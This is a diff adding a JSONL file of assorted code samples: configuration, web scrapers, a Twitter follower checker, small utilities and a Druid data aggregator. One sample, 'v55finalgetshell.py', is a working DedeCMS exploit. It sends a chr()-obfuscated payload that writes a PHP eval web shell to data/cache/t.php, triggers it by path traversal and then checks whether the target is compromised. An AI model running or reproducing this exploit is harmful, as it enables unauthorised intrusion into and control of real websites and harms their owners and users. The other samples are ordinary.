diff --git "a/6487.jsonl" "b/6487.jsonl" new file mode 100644--- /dev/null +++ "b/6487.jsonl" @@ -0,0 +1,732 @@ +{"seq_id":"333208825","text":"import os\n\nfrom pathlib import Path\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\n\ndotenv_path = join(dirname(__file__), '.env')\nload_dotenv(dotenv_path)\n\n\nclass Config(dict):\n\n def __init__(self, defaults=None):\n dict.__init__(self, defaults or {})\n\n def from_object(self, obj):\n for key in dir(obj):\n if key.isupper():\n self[key] = getattr(obj, key)\n\n\nclass BaseConfig:\n DEBUG = False\n\n LOG_ROOT = str(Path(os.path.dirname(__file__)).parent)\n LOG_ROOT = os.path.join(LOG_ROOT, 'logs')\n\n LOGGING_CONFIG = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'\n },\n },\n 'handlers': {\n 'console': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard'\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['console'],\n 'level': 'INFO',\n },\n }\n }\n\n GITHUB_ORG = 'fyndiq'\n GITHUB_REPO = 'fyndiq'\n GITHUB_USERNAME = os.environ.get('GITHUB_USERNAME')\n GITHUB_PASSWORD = os.environ.get('GITHUB_PASSWORD')\n\n PUBSUB_CHANNELS = [\n ('get_rfr_issues', 'callbacks.process_get_rfr_issues'),\n ]\n\n SLACK_DEFAULT_CHANNEL = 'testroom'\n SLACK_BOT_NAME = 'boom'\n\n\nclass DevConfig(BaseConfig):\n DEBUG = True\n\nconfigs = {\n 'default': BaseConfig,\n 'dev': DevConfig,\n}\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"491834675","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 9 12:39:58 2020\r\n\r\n@author: Stephen Sigrist\r\n\"\"\"\r\nimport os\r\nos.chdir(\"..\")\r\n\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nfrom pandasql import sqldf\r\n\r\n# 1: Create Daily Ticker dataframe\r\n#1a: add company name to ticker list\r\ntickers_data = pd.read_csv(\"input files\\\\capstone\\\\capstone_constituents.csv\", index_col=False)\r\n\r\ndef get_symbol(symbol):\r\n url = \"http://d.yimg.com/autoc.finance.yahoo.com/autoc?query={}®ion=1&lang=en\".format(symbol)\r\n\r\n result = requests.get(url).json()\r\n\r\n for x in result['ResultSet']['Result']:\r\n if x['symbol'] == symbol:\r\n return x['name']\r\n\r\ntickers_data['company_name']=tickers_data.ticker.apply(get_symbol)\r\ntickers_data['company_name']=tickers_data['company_name'].str.replace('[^\\w\\s]','')\r\ntickers_data['merge_key']=1\r\ntickers_data['company_name']=tickers_data['company_name'].str.upper() \r\ntickers_data['company_name']=tickers_data['company_name'].str.replace('INCORPORATED', '')\r\ntickers_data['company_name']=tickers_data['company_name'].str.replace('INC', '')\r\ntickers_data['company_name']=tickers_data['company_name'].str.replace('COMPANY', '')\r\ntickers_data['company_name']=tickers_data['company_name'].str.replace('CORPORATION', '')\r\ntickers_data['company_name']=tickers_data['company_name'].str.replace('CORP', '')\r\ntickers_data['name_word_count']=tickers_data['company_name'].str.count(' ') \r\n\r\n#1b: expand to daily\r\ndays= pd.date_range(start='1/1/2010',end='12/31/2020', freq='D',name='datetime')\r\ndays_df=pd.DataFrame({ 'dt': days })\r\ndays_df['date']=days_df['dt'].dt.date\r\ndays_df['merge_key']=1\r\ndel days_df['dt']\r\ndays_df['string_date']=pd.to_datetime(days_df['date']).\\\r\ndt.strftime(\"%Y-%m-%d\").replace(\"NaT\", \"\")\r\ndays_df['str_year']=pd.DatetimeIndex(days_df['date']).year.astype(str)\r\ndays_df['str_month']=pd.DatetimeIndex(days_df['date']).month.astype(str)\r\ndays_df['str_day']=pd.DatetimeIndex(days_df['date']).day.astype(str)\r\n \r\n\r\n\r\nlong_daily_df=pd.merge(tickers_data, days_df, on='merge_key')\r\nlong_daily_df['query']=long_daily_df[\"ticker\"] + \" + \"+ long_daily_df['company_name']+\" on:\"+\\\r\nlong_daily_df[\"str_year\"]+\"-\"+long_daily_df[\"str_month\"]+\"-\"+long_daily_df[\"str_day\"]\r\nprint(long_daily_df['query'][0])\r\n\r\nUSER_AGENT = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \\\r\nChrome/80.0.3987.163 Safari/537.36\"\r\n\r\nmaster_results_df= pd.DataFrame(columns=['query', 'ticker', 'date',\\\r\n'str_year', 'str_month', 'str_day','title', 'link'])\r\n \r\n#long daily df saved 2-12 1-11\r\n#long_daily_df.to_csv(\"constructed\\\\capstone\\\\temp_save_long_daily_df_trhough RGN_12.csv\", sep=',')\r\n#test=long_daily_df[21165:]\r\n\r\nfor a in range(len(long_daily_df)):\r\n query =long_daily_df['query'][a]\r\n print(query)\r\n\r\n URL = f\"https://google.com/search?q={query}\"\r\n headers = {\"user-agent\" : USER_AGENT}\r\n resp = requests.get(URL, headers=headers)\r\n x=resp.status_code\r\n if resp.status_code == 200:\r\n soup = BeautifulSoup(resp.content, \"html.parser\")\r\n \r\n results = []\r\n for g in soup.find_all('div', class_='r'):\r\n anchors = g.find_all('a')\r\n if anchors:\r\n link = anchors[0]['href']\r\n title = g.find('h3').text\r\n item = {\r\n \"title\": title,\r\n \"link\": link\r\n }\r\n results.append(item)\r\n temp_results_df=pd.DataFrame(results)\r\n temp_results_df['query']=query\r\n temp_results_df['date']=long_daily_df['date'][a]\r\n temp_results_df['ticker']=long_daily_df['ticker'][a]\r\n temp_results_df['str_year']=long_daily_df['str_year'][a]\r\n temp_results_df['str_month']=long_daily_df['str_month'][a]\r\n temp_results_df['str_day']=long_daily_df['str_day'][a]\r\n master_results_df=master_results_df.append(temp_results_df)\r\n\r\n\r\n\r\n#Parse link for dates\r\n#master_results_df['link_contains_year']=master_results_df.\\\r\n#apply(lambda row: row.str_year in row.link, axis=1)\r\nmaster_results_df['str_month']=master_results_df['str_month'].str.zfill(2)\r\nmaster_results_df['str_day']=master_results_df['str_day'].str.zfill(2)\r\nmaster_results_df['str_yrmon']=master_results_df.str_year+\"/\"+master_results_df.str_month\r\n\r\nmaster_results_df['link_contains_yrmon']=master_results_df.\\\r\napply(lambda row: row.str_year in row.link, axis=1)\r\n\r\nsubset_df=master_results_df[master_results_df['link_contains_yrmon']==True]\r\nsubset_df=subset_df[['query', 'ticker', 'date', 'link_contains_yrmon','link']]\r\n\r\nsubset_df['key_news']=subset_df['link'].str.contains(\"nytimes\")\r\nsubset_df['key_news']=subset_df['key_news']+subset_df['link'].str.contains(\"nytimes\")\r\nsubset_df['key_news']=subset_df['key_news']+subset_df['link'].str.contains(\"wsj\")\r\nsubset_df['key_news']=subset_df['key_news']+subset_df['link'].str.contains(\"bloomberg\")\r\nsubset_df['key_news']=subset_df['key_news']+subset_df['link'].str.contains(\"ft.com\") \r\nsubset_df['key_news']=subset_df['key_news']+subset_df['link'].str.contains(\"seekingalpha\") \r\nsubset_df=subset_df[subset_df['key_news']>0]\r\n\r\nsentiment_df=pd.read_csv(\"input files\\\\capstone\\\\capstone_sentiment.csv\")\r\n#tosave=subset_df\r\n#subset_df=tosave\r\nsubset_df=subset_df.reset_index(drop=True)\r\nsubset_df['gs_poswords']=0\r\nsubset_df['gs_negwords']=0\r\n\r\nfor a in range(len(subset_df)):\r\n\r\n URL =subset_df.iloc[a, 4]\r\n temp_link=subset_df.iloc[a, 4]\r\n temp_df=pd.DataFrame([[temp_link]], columns=list('x'))\r\n temp_df['link']=temp_df['x']\r\n temp_df=temp_df.drop(columns=['x'])\r\n #print(URL)\r\n try:\r\n headers = {\"user-agent\" : USER_AGENT}\r\n resp = requests.get(URL, headers=headers)\r\n temp_text = resp.text\r\n temp_pos=0\r\n temp_neg=0\r\n \r\n for k in range(len(sentiment_df)):\r\n temp_df[f\"w_{k}\"]=temp_text.upper().count(sentiment_df['word'][k])\r\n \r\n for i in range(0, 1637):\r\n temp_pos=int(temp_pos)+temp_df[f\"w_{i}\"]\r\n\r\n for j in range(1637, 3928):\r\n temp_neg=int(temp_neg)+temp_df[f\"w_{j}\"]\r\n \r\n subset_df.iloc[a,6]=int(temp_pos)\r\n subset_df.iloc[a,7]=int(temp_neg)\r\n \r\n temp_pos=0\r\n temp_neg=0\r\n temp_text=\"\"\r\n \r\n except:\r\n print(\"NULL\")\r\n\r\n\r\n#aggregate to Monthly\r\nsubset_df['year']=pd.DatetimeIndex(subset_df['date']).year\r\nsubset_df['month']=pd.DatetimeIndex(subset_df['date']).month\r\npysqldf = lambda q: sqldf(q, globals())\r\nq = \"\"\"\r\nSELECT DISTINCT\r\nticker, year, month, \r\nSUM(gs_poswords) as gs_poswords,\r\nSUM(gs_negwords) as gs_negwords\r\nFROM\r\nsubset_df\r\nGROUP BY\r\nticker, year, month\r\nORDER BY\r\nticker, year, month\r\n\"\"\"\r\nagg_mthly_df= pysqldf(q)\r\n \r\nagg_mthly_df.to_csv(\"constructed\\\\capstone\\\\google_scrape_mthly.csv\", sep=',')\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"python/capstone/3. Capstone Scrape Google.py","file_name":"3. Capstone Scrape Google.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"223918837","text":"import requests\nfrom termcolor import cprint\n\n\nclass final_getshell:\n\n def __init__(self,url):\n self.url = url\n\n def checktrace(self):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\"\n }\n payload = \"plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr\"\\\n \"(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr\"\\\n \"(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112)\"\\\n \".chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(9\"\\\n \"5).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(120).chr(39).chr(93).chr(41)\"\\\n \".chr(59).chr(63).chr(62));/*\"\n payload2 = \"needCode=aa/../../../data/mysql_error_trace\"\n payload3 = \"data/cache/t.php\"\n if '://' not in self.url:\n self.url = 'http://' + self.url + '/'\n url = self.url\n vulnurl = url + payload\n\n try:\n r = requests.get(url=vulnurl,headers=headers)\n if r.status_code == 200 :\n m = requests.post(url=url+'plus/comments_frame.php',data=payload2,headers=headers)\n if m.status_code == 200:\n s = requests.get(url=url+payload3,headers=headers)\n if s.status_code == 200:\n cprint(\"target may be getshell:\" + url + payload3, \"red\")\n\n except:\n return False","sub_path":"script/v55finalgetshell.py","file_name":"v55finalgetshell.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"577734923","text":"# coding=utf-8\nfrom tweepy import TweepError\n\nfrom pychroner import PluginMeta, PluginType\n\n\ndef getAllFollow(api):\n t = []\n cursor = -1\n while cursor != 0:\n r = api.friends(count=200, cursor=cursor)\n t += [x._json for x in r[0]]\n if cursor != -1:\n break\n cursor = r[1][1]\n return t\n\ndef getAllFollower(api):\n t = []\n cursor = -1\n while cursor != 0:\n r = api.followers(count=200, cursor=cursor)\n t += [x._json for x in r[0]]\n if cursor != -1:\n break\n cursor = r[1][1]\n return t\n\n@PluginMeta(PluginType.Schedule, twitterAccount=\"SlashNephy\", multipleMinute=5)\ndef do(pluginApi):\n api = pluginApi.getTwitterAccount().getTweepyHandler()\n db = pluginApi.getMongoDB().getCollection(\"bot\")\n\n follow = getAllFollow(api)\n follower = getAllFollower(api)\n\n text = []\n for userId in ({x[\"id\"] for x in db.follower.find()} - {x[\"id\"] for x in follower}):\n try:\n data = api.get_user(user_id=userId)\n except TweepError as e:\n if e.api_code == 50:\n text.append(f\"@{db.follower.find_one({'id': userId})['screen_name']} が垢消ししました.\")\n elif e.api_code == 63:\n text.append(f\"@{db.follower.find_one({'id': userId})['screen_name']} が凍結されました.\")\n continue\n\n if data.followers_count == 0 and data.friends_count == 0:\n text.append(f\"@{data.screen_name} がアカウントロックされました.\")\n\n if data.screen_name in [\"falcon_lunch\", \"comic_cune\"]:\n continue\n\n data2 = api.show_friendship(target_id=userId)[0]\n\n if data2.blocked_by:\n text.append(f\"@{data.screen_name} にブロックされました.\")\n elif data2.blocking:\n text.append(f\"@{data.screen_name} をブロックしました.\")\n else:\n text.append(\n f\"@{data.screen_name} にリムーブされました. 現在, {'片思い' if data2.following else 'FF関係消滅'}中です.\"\n f\"(フォロワー数 {data.followers_count} / フォロー数 {data.friends_count} / FF比 {round(data.followers_count / data.friends_count, 3) if data.friends_count != 0 else data.followers_count})\"\n )\n\n # フォローとフォロワーを更新\n db.follow.remove()\n db.follow.insert_many(follow)\n db.follower.remove()\n db.follower.insert_many(follower)\n\n if text:\n pluginApi.getSlack().post(\n channel=\"#ff-checker\",\n username=\"Twitter FF Checker\",\n text=\"\\n\\n\".join(text)\n )\n","sub_path":"plugins/SlashNephy/AccountChecker.py","file_name":"AccountChecker.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"277336326","text":"\n# write dictionary to file and print file data after reading\ncolorDic = {1: 'Red', 2: 'Blue', 3: 'Green'} \nfilename= 'abc.txt'\n\ntry: \n fileHandler = open(filename, 'wt') \n fileHandler.write(str(colorDic)) \n fileHandler.close() \n \nexcept: \n print(\"Unable to write to file\")\n\ncontent = open(filename)\nprint(content.read())\n","sub_path":"File_IO.py","file_name":"File_IO.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"192956439","text":"# 数字转为千分位\r\ndef convert_str_contain_comma_v2(num):\r\n if num == '-':\r\n return num\r\n split_num = str(num).split('.')\r\n int_part = split_num[0]\r\n decimal_part = '.' + split_num[1] if len(split_num) > 1 else ''\r\n\r\n result = ''\r\n count = 0\r\n for i in int_part[::-1]:\r\n count += 1\r\n result += i\r\n if count % 3 == 0:\r\n result += ','\r\n return result[::-1].strip(',') + decimal_part\r\n\r\n\r\n","sub_path":"settlements/report/convert_str_contain_comma_v2.py","file_name":"convert_str_contain_comma_v2.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"413610769","text":"from builtins import object\nimport math\nimport os\nfrom datetime import datetime\nfrom collections import defaultdict\nfrom multiprocessing.dummy import Pool as ThreadPool\n\nfrom flask import request, current_app\n\nfrom pydruid.utils.filters import Dimension\n\nfrom config.system import STANDARD_DATA_DATE_FORMAT\nfrom db.druid.query_builder import GroupByQueryBuilder\nfrom db.druid.util import build_time_interval, EmptyFilter\nfrom log import LOG\nfrom web.server.environment import IS_PRODUCTION\nfrom web.server.routes.views.series_statistics import fill_stats\nfrom web.server.util.util import Error, Success\n\nUSE_THREAD_POOL = False\n\n# Set to true for demos that should not display sensitive health information.\nUSE_RANDOMIZED_DATA = False\n\n# Geo field selection of 'nation' will be treated as a special case.\nNATION_GEO_FIELD = 'nation'\n\nDEFAULT_TIME_BUCKET = 'month'\n\nDEFAULT_GRANULARITIES = ['month', 'all']\n\n\nclass GeoTimeAggregator(object):\n '''\n Aggregates by geography and time.\n '''\n\n def __init__(self, query_client, geo_field_ordering):\n self.geo_field = None\n self.denom = None\n self.location_filters = []\n self.non_hierarchical_filter = EmptyFilter()\n self.data_fields = set()\n self.calculated_fields = {}\n self.ordered_fields = []\n self.latitude_field = None\n self.longitude_field = None\n self.start_date = None\n self.end_date = None\n self.selected_granularities = DEFAULT_GRANULARITIES\n self.time_bucket = None\n\n self.request_data = None\n self.request_is_demo = False\n self.use_randomized_data = False\n\n self.calculation = None\n self.druid_slice_dimensions = []\n self.druid_geo_dimensions = []\n self.batches = None\n self.response = None\n self.query_client = query_client\n self.all_geo_dimensions = set(geo_field_ordering)\n\n # Initialize basic structure of result\n self.results = {\n # Aggregate stats.\n 'overall': {\n 'totals': defaultdict(int),\n 'median': defaultdict(int),\n 'first_quartile': defaultdict(int),\n 'third_quartile': defaultdict(int),\n 'mean': defaultdict(int),\n 'std': defaultdict(int),\n 'variance': defaultdict(int),\n 'min': defaultdict(int),\n 'max': defaultdict(int),\n 'num_nonzero': defaultdict(int),\n },\n # Geo-level stats.\n 'byGeo': {},\n }\n\n def get_response(self):\n return self.response\n\n def run(self, request_data=None):\n if request_data is None:\n self.request_data = request.get_json(force=True)\n else:\n self.request_data = request_data\n\n result = all(\n f()\n for f in [\n self.parse_arguments,\n self.run_query,\n self.process_batches,\n self.postprocess_results,\n ]\n )\n if not result and self.response is None:\n self.response = Error('Sorry, an unhandled error has occurred.')\n\n def parse_arguments(self):\n self.request_is_demo = self.request_data.get('demo')\n\n # Parse overall modifiers.\n self.use_randomized_data = USE_RANDOMIZED_DATA or self.request_is_demo\n\n # Location filters are default OR.\n # TODO(stephen, ian): When needed, allow more complex filtering\n filters = self.request_data.get('filters', [])\n for f in filters:\n if not len(list(f.keys())):\n # Skip empty filters.\n continue\n\n # HACK(stephen): Handle both hierarchical dimension filters (which\n # should be OR'd together) and non-hierarchical dimensions (which\n # should all be AND'd together) with the location filters\n first_key = list(f.keys())[0]\n if len(f) == 1 and first_key not in self.all_geo_dimensions:\n self.non_hierarchical_filter &= (\n Dimension(first_key) == list(f.values())[0]\n )\n continue\n\n location_filter = {}\n # Validate that the dimensions being filtered on actually exist\n for key, value in list(f.items()):\n # NOTE(stephen): This should never happen\n if key not in self.all_geo_dimensions:\n LOG.warn(\n 'A location filter contains non-location columns to '\n 'filter by. Filter: %s',\n f,\n )\n location_filter[key] = value\n if location_filter:\n self.location_filters.append(location_filter)\n\n geo_granularity = self.request_data.get('granularity')\n if geo_granularity != NATION_GEO_FIELD:\n latlng_fields = current_app.zen_config.aggregation.GEO_TO_LATLNG_FIELD.get(\n geo_granularity\n )\n if latlng_fields:\n self.latitude_field = latlng_fields[0]\n self.longitude_field = latlng_fields[1]\n self.geo_field = geo_granularity\n\n # Capture requested fields\n request_fields = self.request_data.get('fields', [])\n\n # Parse denominator\n denom = self.request_data.get('denominator')\n if denom:\n if denom in current_app.zen_config.indicators.VALID_FIELDS:\n self.denom = denom\n request_fields.append(denom)\n else:\n error_msg = 'Invalid denominator specified: %s' % denom\n self.response = Error(error_msg)\n return False\n\n # Deduplicate field list while maintaining the user's selected order\n # since the frontend has implicit requirements around field ordering\n for field in request_fields:\n self.data_fields.add(field)\n\n # TODO(stephen): Is this even necessary? Can the frontend send\n # duplicate fields? Also, would love an ordered set here instead\n # of searching the list.\n if field not in self.ordered_fields:\n self.ordered_fields.append(field)\n\n bad_fields = self.data_fields - current_app.zen_config.indicators.VALID_FIELDS\n if bad_fields:\n error_msg = 'Invalid fields specified: %s' % ', '.join(bad_fields)\n self.response = Error(error_msg)\n return False\n\n self.selected_granularities = self.request_data.get(\n 'granularities', DEFAULT_GRANULARITIES\n )\n\n self.calculation = current_app.zen_config.aggregation_rules.get_calculation_for_fields(\n self.data_fields\n )\n self.calculation.set_strict_null_fields(self.data_fields)\n\n # Get dates\n # TODO(stephen, ian): Validate these\n self.start_date = datetime.strptime(\n self.request_data.get('start_date'), STANDARD_DATA_DATE_FORMAT\n ).date()\n self.end_date = datetime.strptime(\n self.request_data.get('end_date'), STANDARD_DATA_DATE_FORMAT\n ).date()\n self.time_bucket = self.request_data.get('time_bucket', DEFAULT_TIME_BUCKET)\n return True\n\n def run_query(self):\n '''\n Constructs and runs the Druid request for this query. The query is\n blocking.\n '''\n\n LOG.info('Running query...')\n\n # Filter the dimensions using the location filters passed in\n dimension_filter = GroupByQueryBuilder.build_dimension_filter(\n self.location_filters\n )\n\n # AND the selected locations with the non-location filters requested\n dimension_filter &= self.non_hierarchical_filter\n\n # Slice by selected granularity + all fields less specific than it. For\n # example, if user makes a Woreda query, we also want to slice by Zone\n # and Region.\n if self.geo_field:\n # Restrict query to non-null for the given geo\n dimension_filter &= Dimension(self.geo_field) != ''\n\n # Set the appropriate dimensions for this query\n self.druid_slice_dimensions = self.get_slice_dimensions()\n if self.latitude_field and self.longitude_field:\n self.druid_geo_dimensions = [self.latitude_field, self.longitude_field]\n\n grouping_fields = self.druid_slice_dimensions + self.druid_geo_dimensions\n\n batches = []\n overall_interval = build_time_interval(self.start_date, self.end_date)\n for selected_granularity in self.selected_granularities:\n granularity = selected_granularity\n intervals = [overall_interval] # Druid expects time intervals as\n # a list\n granularity = current_app.zen_config.aggregation_rules.get_granularity_for_interval(\n selected_granularity, self.start_date, self.end_date\n )\n\n query = GroupByQueryBuilder(\n datasource=current_app.druid_context.current_datasource.name,\n granularity=granularity,\n grouping_fields=grouping_fields,\n intervals=intervals,\n calculation=self.calculation,\n dimension_filter=dimension_filter,\n )\n\n batch = QueryBatch(\n query,\n selected_granularity,\n self.geo_field,\n self.latitude_field,\n self.longitude_field,\n self.ordered_fields,\n self.denom,\n self.druid_slice_dimensions,\n self.query_client,\n )\n batches.append(batch)\n\n num_granularities = len(self.selected_granularities)\n if USE_THREAD_POOL and num_granularities > 1:\n pool = ThreadPool(num_granularities)\n pool.map(QueryBatch.run, batches)\n pool.close()\n pool.join()\n else:\n _ = [batch.run() for batch in batches]\n\n self.batches = batches\n return True\n\n def process_batches(self):\n '''\n Pack results from Druid into our format.\n '''\n\n LOG.info('Processing batches...')\n\n geo_results = self.results['byGeo']\n\n batch_warnings = []\n for batch in self.batches:\n for geo_key, geo_result in list(batch.result.items()):\n if geo_result.has_data():\n if geo_key not in geo_results:\n geo_results[geo_key] = GeoResult(geo_result.metadata)\n geo_results[geo_key].data.update(geo_result.data)\n batch_warnings.extend(geo_results[geo_key].warnings)\n\n if len(batch_warnings):\n LOG.warn('!! You overwrote existing data. Run in dev for detailed debug.')\n if not IS_PRODUCTION:\n # Only show these errors in dev. In production, these outputs\n # can overwhelm slow disks.\n print('\\n'.join(batch_warnings))\n\n return True\n\n def postprocess_results(self):\n LOG.info('Postprocessing results...')\n self.fill_metadata_and_stats()\n\n # Tell the frontend which fields we are returning.\n if self.denom:\n self.results['fieldsToDisplay'] = [\n x for x in self.ordered_fields if x != self.denom\n ]\n else:\n self.results['fieldsToDisplay'] = self.ordered_fields\n\n # Final json response.\n self.response = Success(self.results)\n return True\n\n def fill_metadata_and_stats(self):\n '''\n Compute 'overall' metadata\n '''\n # We only want to compute metadata if the 'all' granularity was\n # selected.\n if 'all' not in self.selected_granularities:\n return\n\n # Done grabbing field data, now set up stats.\n field_to_values = defaultdict(list)\n for geo_result in list(self.results['byGeo'].values()):\n # The \"all\" granularity will contain the total values needed for\n # stats computation. The data series will only contain a single\n # date which all data will be rolled up into.\n # HACK(stephen): Work around bug where some geo results do not have\n # \"all\" data set.\n if 'all' not in geo_result.data:\n continue\n\n for field, value in list(list(geo_result.data['all'].values())[0].items()):\n # 1) Create map from field to list of values, used for stats\n # later.\n field_to_values[field].append(value)\n\n # Done with denominators, now compute statistics.\n fill_stats(self.results['overall'], field_to_values)\n\n def get_slice_dimensions(self):\n return current_app.zen_config.aggregation.DIMENSION_SLICES.get(\n self.geo_field, [self.geo_field]\n )\n\n\nclass QueryBatch(object): # pylint: disable=too-few-public-methods\n def __init__(\n self,\n druid_query,\n granularity,\n geo_field,\n lat_field,\n lon_field,\n ordered_fields,\n denom,\n druid_slice_dimensions,\n query_client,\n ):\n self.druid_query = druid_query\n self.granularity = granularity\n self.geo_field = geo_field\n self.lat_field = lat_field\n self.lon_field = lon_field\n self.ordered_fields = ordered_fields\n self.denom = denom\n self.druid_slice_dimensions = druid_slice_dimensions\n self.query_client = query_client\n self.query_result = {}\n self.result = None\n\n def run(self):\n LOG.debug('Starting: %s', self.granularity)\n self.query_result = self.query_client.run_query(self.druid_query)\n\n LOG.debug('Query completed: %s', self.granularity)\n self.result = self._process_query_result()\n\n LOG.debug('Finished: %s', self.granularity)\n\n def _process_query_result(self):\n output = {}\n for row in self.query_result:\n # TODO(stephen): Handle optimized queries changing from groupby\n # to timeseries better (the results are stored in a different field)\n event = row.get('event', row.get('result'))\n geo_key = '__'.join(\n [event.get(d) or '' for d in self.druid_slice_dimensions]\n )\n if geo_key not in output:\n metadata = self._build_metadata_for_event(event)\n output[geo_key] = GeoResult(\n metadata, self.granularity, self.ordered_fields, self.denom\n )\n output[geo_key].process_event(event, row['timestamp'])\n return output\n\n def _build_metadata_for_event(self, event):\n output = {\n # Special case for national level searches since this is not\n # stored as a dimension in the database\n 'name': event[self.geo_field]\n if self.geo_field\n else current_app.zen_config.general.NATION_NAME,\n 'lat': event.get(self.lat_field),\n 'lng': event.get(self.lon_field),\n }\n\n for dim in self.druid_slice_dimensions:\n output[dim] = event[dim]\n\n return output\n\n\nclass GeoResult(dict):\n def __init__(self, metadata, granularity=None, data_fields=None, denom_field=None):\n super(GeoResult, self).__init__()\n self.metadata = metadata\n self.data = {}\n self.warnings = []\n\n if granularity:\n self.data[granularity] = defaultdict(lambda: defaultdict(float))\n self._granularity = granularity\n self._data_fields = data_fields\n self._denom_field = denom_field\n\n def process_event(self, event, timestamp):\n for field in self._data_fields:\n field_value = event[field]\n\n if self._should_skip_field(field, field_value):\n continue\n\n # Apply denominator if it exists\n if self._denom_field:\n denom_value = event.get(self._denom_field) or 0.0\n if denom_value == 0:\n # TODO(ian, stephen): Should there be some time of warning\n # displayed to the user?\n field_value = 0\n else:\n field_value /= denom_value\n cur_result = self.data[self._granularity][timestamp]\n if field in cur_result:\n self.warnings.append(\n 'You overwrote existing data for '\n '%s, %s with event \\'%s\\' but it already has \\'%s\\'.'\n % (self._granularity, field, event, cur_result)\n )\n # TODO(ian): Temporary hack on 11/3/2016 to hide the fact that we\n # don't aggregate correctly on data that isn't normalized or is\n # grouped by differeing latlng.\n if os.environ.get('ZEN_ENV').lower() is 'za':\n cur_result[field] += field_value\n else:\n cur_result[field] = field_value\n\n def has_data(self):\n for series in list(self.data.values()):\n if series:\n return True\n return False\n\n def _should_skip_field(self, field, value):\n # Don't store the denominator as a separate value in the results.\n if field is self._denom_field:\n return True\n\n # Sometimes null, NaN, Infinity, -Infinity can be returned for a\n # field's value from druid.\n if value is None or math.isnan(value) or math.isinf(value):\n return True\n\n return False\n\n @property\n def metadata(self):\n return self['metadata']\n\n @metadata.setter\n def metadata(self, data):\n self['metadata'] = data\n\n @property\n def data(self):\n return self['data']\n\n @data.setter\n def data(self, data):\n self['data'] = data\n","sub_path":"web/server/routes/views/geo_time_aggregator.py","file_name":"geo_time_aggregator.py","file_ext":"py","file_size_in_byte":17936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"2438403","text":"import requests\nimport ujson\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm\nfrom src.io import write\nfrom src import settings\nfrom .scrape_games_output import ScrapeGamesOutput, ScrapeGamesPathParams\n\ndomain = 'https://understat.com'\n\n\ndef handler(event=None, context=None):\n\thome_soup = BeautifulSoup(requests.get(domain).text, 'html.parser')\n\tleagues = [\n\t\t{'name': a.text, 'url': '%s/%s' % (domain, a['href'])} for a in\n\t\thome_soup.find('header', {'id': 'header'}).find('nav', {'class': 'm-navigation'}).find_all('a')\n\t]\n\tleague_season_tuples = []\n\tfor league in tqdm(leagues):\n\t\tleague_soup = BeautifulSoup(requests.get(league['url']).text, 'html.parser')\n\t\tseasons = [int(o['value']) for o in league_soup.find('select', {'name': 'season'}).find_all('option')]\n\t\tmin_season_to_scrape = settings.get_min_season_to_scrape()\n\t\tseasons = [s for s in seasons if s >= min_season_to_scrape]\n\t\tleague_season_tuples.extend((league['name'], season) for season in seasons)\n\n\tfor league, season in tqdm(league_season_tuples):\n\t\tgames = ujson.loads(\n\t\t\trequests.get('%s/league/%s/%s' % (domain, league.replace(' ', '_'), season)).text\n\t\t\t\t.split('var datesData')[1]\n\t\t\t\t.split('')[0]\n\t\t\t\t.split('JSON.parse(\\'')[-1]\n\t\t\t\t.split('\\')')[0]\n\t\t\t\t.encode('utf8').decode('unicode_escape')\n\t\t)\n\t\tfor game in games:\n\t\t\tgame['league'] = league\n\t\t\tgame['season'] = season\n\t\twrite(ScrapeGamesOutput(), ScrapeGamesPathParams(league, season), games)\n\n\nif __name__ == '__main__':\n\thandler()\n","sub_path":"src/process/scrape/games/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"456372809","text":"import pika\nimport json\n\n\n\ndef sendMessage(message):\n \n connection = pika.BlockingConnection(pika.ConnectionParameters('example-rabbit', 5672, 'example_vhost'))\n channel = connection.channel()\n \n channel.queue_declare(queue='example')\n\n jsonMessage = json.dumps(message)\n channel.basic_publish(exchange='', routing_key='example', body=jsonMessage)\n\n channel.close()\n connection.close()\n\n return \"Message sent!
Payload:
